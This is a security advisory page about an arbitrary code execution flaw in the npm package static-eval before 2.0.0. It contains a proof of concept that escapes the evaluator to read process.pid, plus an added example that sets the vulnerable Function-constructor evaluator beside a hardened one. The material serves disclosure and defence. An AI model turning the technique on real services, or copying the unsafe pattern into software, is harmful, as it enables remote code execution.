Ecosyste.ms: Advisories
An open API service providing security vulnerability metadata for many open source software ecosystems.
Security Advisories: MDE2OlNlY3VyaXR5QWR2aXNvcnlHSFNBLTVtanctNmpyaC1odmZx
Sandbox Breakout / Arbitrary Code Execution in static-eval
Affected versions of static-eval pass untrusted user input directly to the global Function constructor, resulting in an arbitrary code execution vulnerability when user-supplied input is parsed and evaluated via the package. A function expression inside the evaluated AST is compiled with Function and therefore runs in the Node.js global scope (with access to process and the rest of the runtime), so the "static" evaluation offers no sandbox at all for such input.
Proof of concept
// Requires a vulnerable static-eval (< 2.0.0) and esprima to build the AST
var evaluate = require('static-eval');
var parse = require('esprima').parse;
// An immediately-invoked function expression whose body reads a Node.js global
var src = '(function(){console.log(process.pid)})()';
var ast = parse(src).body[0].expression;
// The FunctionExpression node is handed to the global Function constructor,
// so its body runs with full runtime access despite the empty variable scope
var res = evaluate(ast, {});
// Will print the process id
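The following is an added example, not code from static-eval or from the advisory. It shows the vulnerable pattern described above (regenerate the FunctionExpression as source text and hand it to the global Function constructor) beside a hardened evaluator that refuses function expressions outright; the hardened variant is one possible fix chosen for illustration, not a claim about what static-eval 2.0.0 actually ships. The two ASTs are constructed by hand in ESTree shape (what esprima would produce for `(function(){ return process.pid })()` and for `1 + 2 * x`) so the example runs offline without esprima; `unparse`, `makeEvaluator`, `evaluateUnsafe` and `evaluateSafe` are names introduced here.

```javascript
'use strict';

// Sentinel for "cannot be evaluated statically"; returned instead of thrown so
// callers can fall back safely.
const FAIL = Symbol('FAIL');

// Tiny unparser for the ESTree subset used below. The vulnerable pattern is
// "regenerate the function node as source and hand it to Function", so the
// unsafe evaluator needs source text back out of the node.
function unparse(node) {
  switch (node.type) {
    case 'Literal': return JSON.stringify(node.value);
    case 'Identifier': return node.name;
    case 'MemberExpression': return unparse(node.object) + '.' + unparse(node.property);
    case 'BinaryExpression':
      return '(' + unparse(node.left) + ' ' + node.operator + ' ' + unparse(node.right) + ')';
    case 'CallExpression':
      return unparse(node.callee) + '(' + node.arguments.map(unparse).join(', ') + ')';
    case 'ReturnStatement': return 'return ' + unparse(node.argument) + ';';
    case 'FunctionExpression':
      return '(function (' + node.params.map(unparse).join(', ') + ') { ' +
        node.body.body.map(unparse).join(' ') + ' })';
    default: throw new Error('unparse: unsupported node type ' + node.type);
  }
}

// Interpreter for the harmless node kinds. Only `onFunction`, the handler for a
// FunctionExpression, differs between the unsafe and the hardened variant.
function makeEvaluator(onFunction) {
  return function evaluate(node, vars) {
    switch (node.type) {
      case 'Literal':
        return node.value;
      case 'Identifier':
        // Only caller-supplied variables are visible; no globals leak in here.
        return Object.prototype.hasOwnProperty.call(vars, node.name) ? vars[node.name] : FAIL;
      case 'MemberExpression': {
        const obj = evaluate(node.object, vars);
        if (obj === FAIL || obj === null || typeof obj !== 'object') return FAIL;
        const key = node.computed ? evaluate(node.property, vars) : node.property.name;
        // Own properties only, so prototype members such as constructor stay out of reach.
        if (key === FAIL || !Object.prototype.hasOwnProperty.call(obj, key)) return FAIL;
        return obj[key];
      }
      case 'BinaryExpression': {
        const l = evaluate(node.left, vars);
        const r = evaluate(node.right, vars);
        if (l === FAIL || r === FAIL) return FAIL;
        switch (node.operator) {
          case '+': return l + r;
          case '-': return l - r;
          case '*': return l * r;
          default: return FAIL;
        }
      }
      case 'CallExpression': {
        const fn = evaluate(node.callee, vars);
        if (typeof fn !== 'function') return FAIL;
        const args = node.arguments.map((a) => evaluate(a, vars));
        if (args.includes(FAIL)) return FAIL;
        return fn.apply(null, args);
      }
      case 'FunctionExpression':
        return onFunction(node, vars);
      default:
        return FAIL;
    }
  };
}

// UNSAFE (the advisory's pattern): the node is regenerated as source and compiled
// with the global Function constructor, so its body runs in Node's global scope
// with access to process, require, etc. `vars` become parameters, nothing more.
const evaluateUnsafe = makeEvaluator((node, vars) => {
  const keys = Object.keys(vars);
  const vals = keys.map((k) => vars[k]);
  return Function(keys.join(', '), 'return ' + unparse(node)).apply(null, vals);
});

// HARDENED (an illustrative fix, not necessarily what 2.0.0 does): a static
// evaluator has no business compiling code, so a FunctionExpression is refused
// and the call wrapping it fails with it.
const evaluateSafe = makeEvaluator(() => FAIL);

// Constructed sample input: ESTree for `(function(){ return process.pid })()`.
const pocAst = {
  type: 'CallExpression', arguments: [],
  callee: {
    type: 'FunctionExpression', params: [],
    body: { type: 'BlockStatement', body: [
      { type: 'ReturnStatement', argument: {
        type: 'MemberExpression', computed: false,
        object: { type: 'Identifier', name: 'process' },
        property: { type: 'Identifier', name: 'pid' } } } ] } } };

// Constructed benign input: `1 + 2 * x`. Both variants must still agree on this.
const benignAst = {
  type: 'BinaryExpression', operator: '+',
  left: { type: 'Literal', value: 1 },
  right: { type: 'BinaryExpression', operator: '*',
    left: { type: 'Literal', value: 2 }, right: { type: 'Identifier', name: 'x' } } };

if (typeof require !== 'undefined' && require.main === module) {
  console.log('benign, unsafe:', evaluateUnsafe(benignAst, { x: 3 }));
  console.log('benign, safe  :', evaluateSafe(benignAst, { x: 3 }));
  console.log('poc, unsafe   :', evaluateUnsafe(pocAst, {}), '(equals process.pid: attacker code ran)');
  console.log('poc, safe     :', String(evaluateSafe(pocAst, {})));
}
```

Both evaluators return 7 for the benign expression, but only the unsafe one returns the real process id for the PoC AST: the interpreter never resolves the bare identifier `process` (it is not in `vars`), yet the Function-constructor shortcut bypasses the interpreter entirely. That is the whole bug, and the hardened variant closes it by never leaving interpretation for compilation.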
Recommendation
Update to version 2.0.0 or later.
Permalink: https://github.com/advisories/GHSA-5mjw-6jrh-hvfq
JSON: https://advisories.ecosyste.ms/api/v1/advisories/MDE2OlNlY3VyaXR5QWR2aXNvcnlHSFNBLTVtanctNmpyaC1odmZx
Source: GitHub Advisory Database
Origin: Unspecified
Severity: Moderate
Classification: General
Published: over 6 years ago
Updated: over 1 year ago
EPSS Percentage: 0.01563
EPSS Percentile: 0.86871
Identifiers: GHSA-5mjw-6jrh-hvfq, CVE-2017-16226
References:
- https://nvd.nist.gov/vuln/detail/CVE-2017-16226
- https://github.com/substack/static-eval/pull/18
- https://github.com/advisories/GHSA-5mjw-6jrh-hvfq
- https://maustin.net/articles/2017-10/static_eval
- https://www.npmjs.com/advisories/548
Blast Radius: 0.0
Affected Packages
npm:static-eval
Dependent packages: 109
Dependent repositories: 132,071
Downloads: 14,077,262 last month
Affected Version Ranges: < 2.0.0
Fixed in: 2.0.0
All affected versions: 0.0.0, 0.1.0, 0.1.1, 0.2.0, 0.2.1, 0.2.2, 0.2.3, 0.2.4, 1.0.0, 1.1.0, 1.1.1
All unaffected versions: 2.0.0, 2.0.1, 2.0.2, 2.0.3, 2.0.4, 2.0.5, 2.1.0, 2.1.1